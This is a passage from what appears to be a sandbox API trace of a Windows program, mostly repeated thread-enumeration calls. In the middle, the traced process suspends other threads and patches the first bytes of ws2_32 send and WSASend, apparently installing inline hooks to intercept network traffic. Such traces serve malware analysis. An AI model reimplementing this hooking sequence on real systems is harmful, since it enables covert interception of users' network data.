lpte=0x22cf7c8) returned 1 [0167.911] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.083] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.083] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.084] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.084] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.084] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.085] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.085] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.085] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.085] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.086] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.086] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.086] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.086] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.087] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.087] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.087] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.088] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.088] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.088] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.088] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.089] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.089] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.089] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.089] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.090] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.090] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.090] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.091] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.091] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.091] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.091] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.092] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.092] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.092] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.093] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.093] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.093] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.093] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.094] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.094] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.094] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.094] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.095] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.095] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.095] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.096] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.096] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.096] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.096] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.097] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.097] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.097] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.097] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.098] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.098] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.098] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.099] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.099] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.099] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.100] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.100] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.100] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.100] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.101] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.101] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.101] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.102] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.102] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.102] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.102] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.103] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.103] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.103] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.103] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.104] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.104] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.104] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.105] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.105] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.105] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.105] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.106] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.106] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.106] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.106] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.107] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.107] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.107] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.108] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.108] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.108] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.108] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.109] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.109] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.109] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.110] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.110] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.110] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.110] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.111] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.111] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.111] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.111] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.112] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.112] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.112] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.113] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.113] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.113] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.113] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.114] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.129] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x244) returned 0x8c [0168.129] SuspendThread (hThread=0x8c) returned 0x0 [0168.204] CloseHandle (hObject=0x8c) returned 1 [0168.205] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c8) returned 0x8c [0168.205] SuspendThread (hThread=0x8c) returned 0x0 [0168.205] CloseHandle (hObject=0x8c) returned 1 [0168.248] CloseHandle (hObject=0x88) returned 1 [0168.248] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0168.248] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0168.248] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0168.248] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x170000 [0168.248] RtlMoveMemory (in: Destination=0x170000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x170000) [0168.249] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0168.254] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0168.254] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0168.254] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0168.254] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x180000 [0168.254] RtlMoveMemory (in: Destination=0x180000, Source=0x75bc4406, Length=0x5 | out: Destination=0x180000) [0168.365] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0168.370] GetCurrentProcessId () returned 0x240 [0168.370] GetCurrentThreadId () returned 0xa10 [0168.370] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0168.372] Thread32First (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.372] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.372] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.373] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.373] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.373] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.373] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.374] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.374] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.374] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.375] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.375] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.375] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.375] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.376] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.376] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.376] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.376] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.377] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.377] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.377] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.378] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.378] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.378] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.378] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.379] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.379] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.379] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.380] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.380] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.380] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.380] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.381] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.381] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.381] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.381] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.382] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.382] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.382] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.383] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.383] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.383] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.383] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.384] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.384] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.384] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.385] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.385] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.385] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.385] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.386] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.386] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.386] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.386] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.387] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.387] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.387] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.388] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.388] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.388] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.388] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.389] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.389] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.389] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.389] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.390] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.390] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.390] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.391] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.391] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.391] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.391] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.392] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.392] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.392] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.393] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.393] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.393] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.393] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.394] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.394] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.394] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.394] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.395] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.395] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.396] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.396] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.396] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.396] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.397] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.397] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.397] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.397] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.398] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.398] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.398] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.399] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.399] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.399] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.399] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.400] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.400] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.400] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.401] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.401] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.401] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.401] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.402] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.402] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.402] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.402] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.403] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.403] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.403] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.404] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.404] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.404] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.404] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.405] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.405] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.405] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.405] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.406] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.406] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.406] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.407] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.407] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.407] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.407] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.408] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.408] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.408] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.409] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.409] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.409] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.409] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.410] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.410] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.410] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.545] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.545] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.545] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.546] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.546] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.546] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.547] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.547] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.547] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.547] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.548] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.548] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.548] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.549] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.549] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.549] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.549] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.550] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.550] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.550] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.550] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.551] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.551] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.552] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.552] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.552] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.552] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.553] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.553] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.553] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.554] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.554] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.554] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.554] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.555] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.555] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.555] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.556] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.556] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.556] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.556] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.557] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.557] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.557] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.558] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.558] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.558] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.558] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.559] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.559] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.559] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.559] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.560] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.560] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.560] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.561] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.561] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.561] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.561] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.562] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.562] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.562] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.562] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.563] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.563] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.563] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.564] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.564] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.564] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.564] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.565] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.565] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.565] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.566] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.566] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.566] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.566] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.567] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.567] Thread32Next (hSnapshot=0x88, 